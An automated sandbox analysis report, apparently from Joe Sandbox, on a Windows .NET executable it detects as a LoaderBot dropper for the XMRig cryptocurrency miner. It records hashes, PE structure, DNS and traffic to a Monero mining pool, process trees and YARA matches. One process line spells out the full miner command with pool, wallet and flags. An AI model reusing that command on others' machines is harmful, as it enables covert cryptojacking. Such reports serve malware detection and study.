                                                                          • Filename: 4nmeEJrZJ9.exe, Detection: malicious, Browse
                                                                          Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......^.........."...........k.....N2.........@.............................P........?... ..................................................0..P....@..../...W.......>..:...........................................................0...............................MPRESS1. ...............................MPRESS2.....0...........................rsrc...../..@..../.................@..............................................................v2.19..L...H...(.@.......H.......H.....`..f.@....H....O..H..(..0...&......*.....4%. 0.h. <...W..3.3.A...(.....1(.....0 ...0@.......`..N..Q.......w.....3.H...]K..X.ev.u. [.? L._.k\...........G..q\....Q..@. ......_0...+.........!.8..X0.W....t.".I.%. .. .............~.....~....S.~Cp.W:~..................O.A ...p\........L..`..O..........3.i.e...lA..A.....H...I;..|.....O=.p....-..........3..K/.. ~.@.Q0G.."...Q......)..(..".!......@..P.)...%O.H.1......X0......G.X.XP....^Q..5|^2.E
                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):5.213667050308117
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:01904399.dat.exe
                                                                          File size:4156928
                                                                          MD5:33b4baef7b0a6ad57a7d30af324c4efd
                                                                          SHA1:b169a559615a8448d7ed7da56d36a6850d2092e2
                                                                          SHA256:3a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
                                                                          SHA512:739759d92a9e48e41b0366104ac9edf469cd8f323bbef0b507e3351cf081869ed069b88927fa70329d655012702385a74686df921a62dba95d7ec138a1e46690
                                                                          SSDEEP:49152:ENDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:SzP88fBsnZTgOtqB3m1RC3
                                                                          TLSH:1716AE12BBD58F2BC5564B388AE783647379DC904B43575BA34AB12D3DB23E02B871D8
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^=_..............0..d?.........n.?.. ....?...@.. ........................?.....r.?...`................................
                                                                          Icon Hash:90cececece8e8eb0
                                                                          Entrypoint:0x7f826e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x5F3D5ECA [Wed Aug 19 17:18:02 2020 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3f821c0x4f.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3fa0000x56e.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x3fc0000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x3f62740x3f6400unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x3fa0000x56e0x600False0.4108072916666667data3.977161648473712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x3fc0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_VERSION0x3fa0a00x2e4data
                                                                          RT_MANIFEST0x3fa3840x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 27, 2023 11:22:16.013044119 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:22:16.032238007 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:22:16.032382965 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:22:16.032670021 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:22:16.051829100 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:22:16.052047014 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:22:16.097611904 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:22:17.790553093 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:22:17.925959110 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:22:30.278016090 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:22:30.505156994 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:22:30.522566080 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:22:30.522671938 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:22:36.971442938 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:22:37.130740881 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:22:50.622674942 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:22:50.819340944 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:23:04.271902084 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:23:04.323276043 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:23:07.499193907 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:23:07.617696047 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:23:19.171196938 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:23:19.321840048 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:23:30.329309940 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:23:30.510268927 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:23:32.962342024 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:23:33.010979891 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:24:03.483032942 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:24:03.622493982 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:24:14.343648911 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:24:14.388997078 CEST496943333192.168.2.4141.94.96.71
                                                                          May 27, 2023 11:24:25.880757093 CEST333349694141.94.96.71192.168.2.4
                                                                          May 27, 2023 11:24:25.921307087 CEST496943333192.168.2.4141.94.96.71
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 27, 2023 11:22:15.970175028 CEST5968353192.168.2.48.8.8.8
                                                                          May 27, 2023 11:22:16.004996061 CEST53596838.8.8.8192.168.2.4
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          May 27, 2023 11:22:15.970175028 CEST192.168.2.48.8.8.80xde18Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          May 27, 2023 11:22:16.004996061 CEST8.8.8.8192.168.2.40xde18No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                                          May 27, 2023 11:22:16.004996061 CEST8.8.8.8192.168.2.40xde18No error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                                          May 27, 2023 11:22:16.004996061 CEST8.8.8.8192.168.2.40xde18No error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                                                          May 27, 2023 11:22:16.004996061 CEST8.8.8.8192.168.2.40xde18No error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false

                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:11:22:04
                                                                          Start date:27/05/2023
                                                                          Path:C:\Users\user\Desktop\01904399.dat.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\01904399.dat.exe
                                                                          Imagebase:0x380000
                                                                          File size:4156928 bytes
                                                                          MD5 hash:33B4BAEF7B0A6AD57A7D30AF324C4EFD
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: 00000000.00000000.551027505.00000000005FC000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          Target ID:1
                                                                          Start time:11:22:15
                                                                          Start date:27/05/2023
                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2
                                                                          Imagebase:0x140000000
                                                                          File size:4141064 bytes
                                                                          MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000001.00000002.822561306.0000000000510000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000002.822561306.000000000053B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000002.822561306.0000000000518000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 71%, ReversingLabs
                                                                          • Detection: 70%, Virustotal, Browse
                                                                          Reputation:moderate

                                                                          Target ID:2
                                                                          Start time:11:22:15
                                                                          Start date:27/05/2023
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7c72c0000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.823432979.000001C49DE04000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          Target ID:3
                                                                          Start time:11:22:19
                                                                          Start date:27/05/2023
                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe"
                                                                          Imagebase:0x6e0000
                                                                          File size:4156928 bytes
                                                                          MD5 hash:33B4BAEF7B0A6AD57A7D30AF324C4EFD
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:low

                                                                          Target ID:4
                                                                          Start time:11:22:31
                                                                          Start date:27/05/2023
                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe"
                                                                          Imagebase:0x440000
                                                                          File size:4156928 bytes
                                                                          MD5 hash:33B4BAEF7B0A6AD57A7D30AF324C4EFD
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:low

                                                                          Target ID:5
                                                                          Start time:11:22:43
                                                                          Start date:27/05/2023
                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe"
                                                                          Imagebase:0xb10000
                                                                          File size:4156928 bytes
                                                                          MD5 hash:33B4BAEF7B0A6AD57A7D30AF324C4EFD
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:low

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:19.5%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:50%
                                                                            Total number of Nodes:12
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 9241 fc46d8 9242 fc46f6 9241->9242 9245 fc3690 9242->9245 9244 fc472d 9246 fc6380 LoadLibraryA 9245->9246 9248 fc6493 9246->9248 9251 fc2ae8 9252 fc2b0a 9251->9252 9253 fc2b7b LdrInitializeThunk 9252->9253 9254 fc2b99 9253->9254 9249 fc2613 KiUserExceptionDispatcher 9250 fc2633 9249->9250

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 fc2613-fc262e KiUserExceptionDispatcher 1 fc2a82-fc2a8b 0->1 2 fc2a91-fc2ab8 1->2 3 fc2633-fc263c 1->3 4 fc263e 3->4 5 fc2643-fc2674 3->5 4->5 8 fc267b-fc26a4 5->8 9 fc2676 5->9 13 fc26ab-fc26d9 8->13 14 fc26a6 8->14 9->8 16 fc26db 13->16 17 fc26e0-fc2709 13->17 14->13 16->17 19 fc270b 17->19 20 fc2710-fc2741 17->20 19->20 22 fc2748-fc2771 20->22 23 fc2743 20->23 25 fc2778-fc27ac 22->25 26 fc2773 22->26 23->22 28 fc27ae 25->28 29 fc27b3-fc27fd 25->29 26->25 28->29 32 fc27ff 29->32 33 fc2804-fc2836 29->33 32->33 35 fc283d-fc28cb 33->35 36 fc2838 33->36 38 fc29a1-fc2a6a 35->38 39 fc28d1-fc299c 35->39 36->35 60 fc2a6b-fc2a7f 38->60 39->60 60->1
                                                                            APIs
                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00FC2613
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID: DispatcherExceptionUser
                                                                            • String ID:
                                                                            • API String ID: 6842923-0
                                                                            • Opcode ID: 6605166c3abf4429f916061f29f6513e170dc1a6d234b3d0ebbeccd2ebe17105
                                                                            • Instruction ID: 774a2024a2bd1a245440c3c7d68e5e1f8dc8a239084e1d907af6d927863d5cbb
                                                                            • Opcode Fuzzy Hash: 6605166c3abf4429f916061f29f6513e170dc1a6d234b3d0ebbeccd2ebe17105
                                                                            • Instruction Fuzzy Hash: 74D19C74E01219CFDB64DFA8C994B9DBBB2BF49300F2480AAD409A7351DB34AE81DF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 62 fc2ae8-fc2b08 63 fc2b0f-fc2b55 62->63 64 fc2b0a 62->64 102 fc2b58 call fc03b8 63->102 103 fc2b58 call fc03c9 63->103 104 fc2b58 call fc2da0 63->104 64->63 65 fc2b5e-fc2b97 call fcf600 LdrInitializeThunk 68 fc2b9e-fc2be5 65->68 69 fc2b99 65->69 72 fc2d6e-fc2d77 68->72 69->68 73 fc2d7d-fc2d8e 72->73 74 fc2bea-fc2bf3 72->74 76 fc2bfa-fc2c22 74->76 77 fc2bf5 74->77 79 fc2c29-fc2c4c 76->79 80 fc2c24 76->80 77->76 82 fc2c4e 79->82 83 fc2c53-fc2c6a 79->83 80->79 82->83 85 fc2c6c-fc2c76 83->85 86 fc2c78-fc2c7e 83->86 87 fc2c81-fc2c8e 85->87 86->87 88 fc2c95-fc2ca2 87->88 89 fc2c90 87->89 90 fc2ca9-fc2d6b 88->90 91 fc2ca4 88->91 89->88 90->72 91->90 102->65 103->65 104->65
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 03621a0a76241e5bc0a4407a3bf07df8cc18d4ebc3efc7de5842519082e22902
                                                                            • Instruction ID: 64cccf16c1e4460897207d9d6db04ff0b1b887be7289987c4480f5a6b6a1d278
                                                                            • Opcode Fuzzy Hash: 03621a0a76241e5bc0a4407a3bf07df8cc18d4ebc3efc7de5842519082e22902
                                                                            • Instruction Fuzzy Hash: 0C81AE74E00209DFDB14DFA9DA80A9DBBB2FF88310F24C069D909AB315DB34A942DF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 147 fc2ad9-fc2b08 148 fc2b0f-fc2b55 147->148 149 fc2b0a 147->149 187 fc2b58 call fc03b8 148->187 188 fc2b58 call fc03c9 148->188 189 fc2b58 call fc2da0 148->189 149->148 150 fc2b5e-fc2b97 call fcf600 LdrInitializeThunk 153 fc2b9e-fc2be5 150->153 154 fc2b99 150->154 157 fc2d6e-fc2d77 153->157 154->153 158 fc2d7d-fc2d8e 157->158 159 fc2bea-fc2bf3 157->159 161 fc2bfa-fc2c22 159->161 162 fc2bf5 159->162 164 fc2c29-fc2c4c 161->164 165 fc2c24 161->165 162->161 167 fc2c4e 164->167 168 fc2c53-fc2c6a 164->168 165->164 167->168 170 fc2c6c-fc2c76 168->170 171 fc2c78-fc2c7e 168->171 172 fc2c81-fc2c8e 170->172 171->172 173 fc2c95-fc2ca2 172->173 174 fc2c90 172->174 175 fc2ca9-fc2d6b 173->175 176 fc2ca4 173->176 174->173 175->157 176->175 187->150 188->150 189->150
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: afa785ea7db1f605d41b051a5e9bb012b2b3a881f6a3c4afc0526852ccc7b988
                                                                            • Instruction ID: 615f1342c8ad7d83a3a5023602beec8397134847e112c77b11c619d1575854a8
                                                                            • Opcode Fuzzy Hash: afa785ea7db1f605d41b051a5e9bb012b2b3a881f6a3c4afc0526852ccc7b988
                                                                            • Instruction Fuzzy Hash: 19419074E042498FDB58DFAAD994A9DFBF2BF88300F14C12AD818AB318DB345906DF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1433 fcc788-fcc7ac 1606 fcc7af call fcc94e 1433->1606 1607 fcc7af call fcc788 1433->1607 1608 fcc7af call fcc778 1433->1608 1609 fcc7af call fcc980 1433->1609 1434 fcc7b2-fcc7b6 1435 fcc7bc-fcc7cd call fcbf50 1434->1435 1436 fcc94f-fcc970 1434->1436 1435->1436 1440 fcc7d3-fcc7d8 1435->1440 1447 fcc972-fcc97d 1436->1447 1441 fcc7df-fcc7f3 1440->1441 1442 fcc7da-fcc7dd 1440->1442 1444 fcc7f6-fcc869 1441->1444 1442->1444 1485 fcc87e-fcc880 1444->1485 1486 fcc86b-fcc87c 1444->1486 1447->1447 1449 fcc97f-fcc9ad 1447->1449 1451 fcc9af 1449->1451 1452 fcc9b4-fcc9c2 1449->1452 1451->1452 1456 fcc9ff-fcca0f 1452->1456 1457 fcc9c4-fcc9f7 1452->1457 1459 fcca18-fcca1c 1456->1459 1460 fcca11 1456->1460 1457->1456 1462 fccace-fccadb 1459->1462 1463 fcca22-fcca39 call fcc520 1459->1463 1460->1459 1469 fccadd-fccaed call fcbf50 1462->1469 1470 fccaf8-fccb0f call fcc520 1462->1470 1471 fcca3b-fcca5a 1463->1471 1472 fcca84-fcca92 call fccf48 1463->1472 1488 fccaf2-fccaf6 1469->1488 1482 fccb49-fccb56 1470->1482 1483 fccb11-fccb27 1470->1483 1494 fcca5c-fcca66 call fc3718 1471->1494 1495 fcca6e-fcca82 1471->1495 1490 fcca98 1472->1490 1493 fccb5e-fccb6d 1482->1493 1502 fccb29-fccb33 call fc3718 1483->1502 1503 fccb3b-fccb47 1483->1503 1487 fcc883-fcc8aa 1485->1487 1486->1487 1513 fcc8ac-fcc8bb 1487->1513 1514 fcc8c7-fcc8cb 1487->1514 1488->1470 1488->1493 1496 fccaa0 1490->1496 1499 fccb6f 1493->1499 1500 fccb74-fccb86 1493->1500 1494->1495 1495->1496 1504 fccaaa-fccac9 1496->1504 1499->1500 1515 fccb88-fccb8b 1500->1515 1516 fccba2-fccba6 1500->1516 1502->1503 1503->1493 1504->1493 1610 fcc8be call fce65e 1513->1610 1611 fcc8be call fce668 1513->1611 1520 fcc90c-fcc930 1514->1520 1521 fcc8cd-fcc8da 1514->1521 1612 fccb8d call fcd3e8 1515->1612 1613 fccb8d call fcd3c0 1515->1613 1518 fccbac-fccbb0 1516->1518 1519 fcce5e-fcceb1 1516->1519 1522 fccbf7-fccc41 1518->1522 1523 fccbb2-fccbef 1518->1523 1532 fccebb 1519->1532 1533 fcceb3 1519->1533 1541 fcc93b 1520->1541 1542 fcc932 1520->1542 1526 fcc8dc-fcc8e1 1521->1526 1527 fcc8ee-fcc900 1521->1527 1550 fccc46-fccc7a 1522->1550 1551 fccc43 1522->1551 1523->1522 1525 fcc8c4 1525->1514 1526->1527 1534 fcc8e3-fcc8ec 1526->1534 1527->1520 1540 fcc902-fcc905 1527->1540 1529 fccb93-fccb99 1529->1516 1530 fccb9b 1529->1530 1530->1516 1543 fccebc 1532->1543 1533->1532 1534->1520 1540->1520 1541->1436 1542->1541 1543->1543 1556 fccc8c-fccc8e 1550->1556 1557 fccc7c-fccc8a 1550->1557 1551->1550 1558 fccc91-fcccb8 1556->1558 1557->1558 1562 fcccba-fcccd2 1558->1562 1563 fcccd5-fcccda 1558->1563 1562->1563 1564 fccde0-fccde2 1563->1564 1565 fccce0-fcccfa 1563->1565 1566 fccde4-fccdf6 1564->1566 1567 fcce37-fcce4a 1564->1567 1576 fcccfc-fccd05 1565->1576 1577 fccd0b-fccd2e 1565->1577 1569 fcce1c-fcce2c 1566->1569 1570 fccdf8-fccdfd 1566->1570 1571 fcce4c-fcce50 1567->1571 1569->1567 1581 fcce2e-fcce30 1569->1581 1570->1569 1573 fccdff-fcce1a 1570->1573 1574 fcce5b 1571->1574 1575 fcce52 1571->1575 1573->1571 1582 fcce5c 1574->1582 1575->1574 1576->1577 1577->1564 1583 fccd34-fccd4b 1577->1583 1581->1567 1582->1582 1585 fccd4d-fccd57 1583->1585 1586 fccd59-fccd69 1583->1586 1591 fccdaa-fccdd8 1585->1591 1589 fccd8c 1586->1589 1590 fccd6b-fccd74 1586->1590 1594 fccd8f-fccd91 1589->1594 1592 fccd7b-fccd88 1590->1592 1593 fccd76-fccd79 1590->1593 1591->1564 1595 fccd8a 1592->1595 1593->1595 1596 fccda8 1594->1596 1597 fccd93-fccd97 1594->1597 1595->1594 1596->1591 1597->1596 1600 fccd99-fccda0 call fc3718 1597->1600 1600->1596 1606->1434 1607->1434 1608->1434 1609->1434 1610->1525 1611->1525 1612->1529 1613->1529
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 93fa61179ffd6bca3557000191e20a359f2c5d37635edd57a13dadb775121437
